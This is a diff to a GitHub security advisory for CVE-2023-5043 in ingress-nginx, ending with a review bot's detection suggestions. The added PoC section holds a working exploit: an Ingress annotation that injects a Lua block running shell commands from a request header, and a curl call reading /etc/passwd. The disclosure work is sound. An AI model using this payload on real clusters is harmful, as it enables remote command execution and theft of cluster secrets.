[GHSA-5wj4-wffq-3378] Ingress nginx annotation injection causes arbitrary command execution #3287

Closed
@@ -1,13 +1,13 @@
{
"schema_version": "1.4.0",
"id": "GHSA-5wj4-wffq-3378",
"modified": "2023-11-03T19:13:55Z",
"modified": "2023-11-03T19:13:56Z",
"published": "2023-10-25T21:30:33Z",
"aliases": [
"CVE-2023-5043"
],
"summary": "Ingress nginx annotation injection causes arbitrary command execution",
"details": "### Issue Details\nA security issue was identified in ingress-nginx where the nginx.ingress.kubernetes.io/configuration-snippet annotation on an Ingress object (in the networking.k8s.io or extensions API group) can be used to inject arbitrary commands, and obtain the credentials of the ingress-nginx controller. In the default configuration, that credential has access to all secrets in the cluster.\n\nThis issue has been rated High (CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:L/A:L), and assigned CVE-2023-5043.\n\n### Affected Components and Configurations\nThis bug affects ingress-nginx. If you do not have ingress-nginx installed on your cluster, you are not affected. You can check this by running kubectl get po -n ingress-nginx.\n\nIf you are running the “chrooted” ingress-nginx controller introduced in v1.2.0 (gcr.io/k8s-staging-ingress-nginx/controller-chroot), command execution is possible but credential extraction is not, so the High severity does not apply.\n\nMulti-tenant environments where non-admin users have permissions to create Ingress objects are most affected by this issue.\n\n#### Affected Versions\n<v1.9.0\n#### Versions allowing mitigation\nv1.9.0\n### Mitigation\nIngress Administrators should set the --enable-annotation-validation flag to enforce restrictions on the contents of ingress-nginx annotation fields.\n\n### Detection\nIf you find evidence that this vulnerability has been exploited, please contact [email protected]\n\n### Additional Details\nSee ingress-nginx Issue [#10571](https://github.com/kubernetes/ingress-nginx/issues/10571) for more details.\n\n### Acknowledgements\nThis vulnerability was reported by suanve\n\nThank You,\nCJ Cullen on behalf of the Kubernetes Security Response Committee",
"details": "### Issue Details\nA security issue was identified in ingress-nginx where the nginx.ingress.kubernetes.io/configuration-snippet annotation on an Ingress object (in the networking.k8s.io or extensions API group) can be used to inject arbitrary commands, and obtain the credentials of the ingress-nginx controller. In the default configuration, that credential has access to all secrets in the cluster.\n\nThis issue has been rated High (CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:L/A:L), and assigned CVE-2023-5043.\n\n### Affected Components and Configurations\nThis bug affects ingress-nginx. If you do not have ingress-nginx installed on your cluster, you are not affected. You can check this by running kubectl get po -n ingress-nginx.\n\nIf you are running the “chrooted” ingress-nginx controller introduced in v1.2.0 (gcr.io/k8s-staging-ingress-nginx/controller-chroot), command execution is possible but credential extraction is not, so the High severity does not apply.\n\nMulti-tenant environments where non-admin users have permissions to create Ingress objects are most affected by this issue.\n\n#### Affected Versions\n<v1.9.0\n#### Versions allowing mitigation\nv1.9.0\n\n### PoC\n\n1. Create Ingress (can be created without Service and Pod)\n```yaml\napiVersion: networking.k8s.io/v1\nkind: Ingress\nmetadata:\n name: ingress-exploit\n annotations:\n kubernetes.io/ingress.class: \"nginx\"\n nginx.ingress.kubernetes.io/configuration-snippet: |\n more_set_headers \"robinak\"\n proxy_pass http://upstream_balancer;\n proxy_redirect off;\n }\n location /robinak/ { content_by_lua_block { local rsfile = io.popen(ngx.req.get_headers()[\"cmd\"]);local rschar = rsfile:read(\"*all\");ngx.say(rschar); } } location /fs/{\nspec:\n rules:\n - host: robinak.me\n http:\n paths:\n - path: /\n pathType: Prefix\n backend:\n service:\n name: exploit\n port:\n number: 80\n```\n2. 
Make request by specifying the public address of your Ingress NGINX controller:\n```bash\ncurl -v -H 'Host: robinak.me' -H \"cmd: cat /etc/passwd\" http://IP/robinak/\n```\n3. Got RCE\n![image](https://user-images.githubusercontent.com/80983900/296797549-1dc1f87b-5399-4125-beb3-5344ee2c3223.png)\n\n### Mitigation\nIngress Administrators should set the --enable-annotation-validation flag to enforce restrictions on the contents of ingress-nginx annotation fields.\n\n### Detection\nIf you find evidence that this vulnerability has been exploited, please contact [email protected]\n\n### Additional Details\nSee ingress-nginx Issue [#10571](https://github.com/kubernetes/ingress-nginx/issues/10571) for more details.\n\n### Acknowledgements\nThis vulnerability was reported by suanve\n\nThank You,\nCJ Cullen on behalf of the Kubernetes Security Response Committee",
"severity": [
{
"type": "CVSS_V3",
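Review bot: the new `details` string adds a PoC section but leaves `### Detection` unchanged, so the advisory still offers only a contact address even though the PoC itself shows the signal a defender would look for: an Ingress whose `nginx.ingress.kubernetes.io/configuration-snippet` annotation carries directives such as `location` or `content_by_lua_block`, which a snippet meant for proxy headers has no reason to contain. Suggest a sentence under Detection to that effect (e.g. list all Ingress objects with `kubectl get ingress -A -o yaml` and review that annotation), and a pointer that `--enable-annotation-validation` in v1.9.0 is the control that rejects such values. Also, step 3 ("Got RCE") is only an image link to user-images.githubusercontent.com; advisory consumers that strip images (OSV mirrors, CLI tooling) will see an empty step, so state the observed result in text. The one-second bump of `modified` is consistent with the edit and needs no change.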